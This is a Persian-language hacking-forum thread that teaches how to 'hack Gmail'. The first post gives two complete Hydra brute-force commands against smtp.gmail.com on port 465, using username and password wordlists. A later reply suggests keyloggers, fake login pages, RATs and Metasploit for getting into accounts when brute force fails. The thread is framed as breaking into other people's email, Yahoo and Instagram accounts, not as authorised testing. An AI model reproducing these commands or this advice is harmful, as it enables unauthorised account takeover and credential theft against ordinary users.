رفتن به مطلب
بازگشایی انجمن! ×
GuardIran

پست های پیشنهاد شده

سلام با عرض ادب و احترام من میخوام درباره ی هک جیمیل با هیدرا البته با راه دبگه ای رو بهتون اموزش بدم.

به جای زدن:hydra -S -l /root/Desktop/userlist.txt -P /root/Desktop/password.txt -u -e ns -V -s 465 smtp.gmail.com smtp

فقط پسورد ها رو دونه دونه امتحان میکند میتوانید از این را برید.که هم پر سرعت تر هست هم همه پسوورد ها را با دقت بیشتری امتحان میکنه.

hydra -S -l /root/Desktop/userlist.txt -P /root/Desktop/password.txt -v -V -e ns -s 465 smtp.gmail.com smtp

ممنون از همهی کار کنان زحمت کش گارد ایران.خواهشا اگه دیدید به کارتون میاد روی گزینه ی تشکر کلید کنید.

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

• 4 هفته بعد...

سلام با عرض ادب و احترام من میخوام درباره ی هک جیمیل با هیدرا البته با راه دبگه ای رو بهتون اموزش بدم.

به جای زدن:hydra -S -l /root/Desktop/userlist.txt -P /root/Desktop/password.txt -u -e ns -V -s 465 smtp.gmail.com smtp

فقط پسورد ها رو دونه دونه امتحان میکند میتوانید از این را برید.که هم پر سرعت تر هست هم همه پسوورد ها را با دقت بیشتری امتحان میکنه.

hydra -S -l /root/Desktop/userlist.txt -P /root/Desktop/password.txt -v -V -e ns -s 465 smtp.gmail.com smtp

ممنون از همهی کار کنان زحمت کش گارد ایران.خواهشا اگه دیدید به کارتون میاد روی گزینه ی تشکر کلید کنید.

سلام داداش گلم

دو تا سوال دارم

اول هم اینکه من چند باز سعی کردم جیمیل خودمو بزنم ولی نشد یا پسورد اشتباه میداد یا میگفت اصلا نتونستم پسوردی پیدا کنم

دومین سوالمم - پورت جیمیل 465

حالا پورت یاهو - اینستاگرام و ... رو از کجا پیدا کنم

لینک به دیدگاه

• 2 هفته بعد...

سلام داداش گلم

دو تا سوال دارم

اول هم اینکه من چند باز سعی کردم جیمیل خودمو بزنم ولی نشد یا پسورد اشتباه میداد یا میگفت اصلا نتونستم پسوردی پیدا کنم

دومین سوالمم - پورت جیمیل 465

حالا پورت یاهو - اینستاگرام و ... رو از کجا پیدا کنم

سلام ممنون از نظرتون.

وجواب سوالات:

1:هیدرا دیگر از کار افتاده است و نمی تواند به سرور اتک بدهد شما میتوانید از راه های دیگر نفوذ کنید.

1:کیلاگر

2:فیک پیج

3:رات

4:متاسپلوت

میتوانید نفوذ کنید.و بریم سراغ سوال بعدیتون.

2:شما میتونید برای پیدا کردن پورت یا در انجمن یا در گوگل سرچ کنید و موفق به پیدا کردن پورت مورد نظر شوید.

(موفق و سربلند باشید)

لینک به دیدگاه

به گفتگو بپیوندید

هم اکنون می توانید مطلب خود را ارسال نمایید و بعداً ثبت نام کنید. اگر حساب کاربری دارید، برای ارسال با حساب کاربری خود اکنون وارد شوید .

مهمان
ارسال پاسخ به این موضوع...

×   شما در حال چسباندن محتوایی با قالب بندی هستید.   حذف قالب بندی

تنها استفاده از 75 اموجی مجاز می باشد.

×   لینک شما به صورت اتوماتیک جای گذاری شد.   نمایش به صورت لینک

×   محتوای قبلی شما بازگردانی شد.   پاک کردن محتوای ویرایشگر

×   شما مستقیما نمی توانید تصویر خود را قرار دهید. یا آن را اینجا بارگذاری کنید یا از یک URL قرار دهید.

• ایجاد مورد جدید...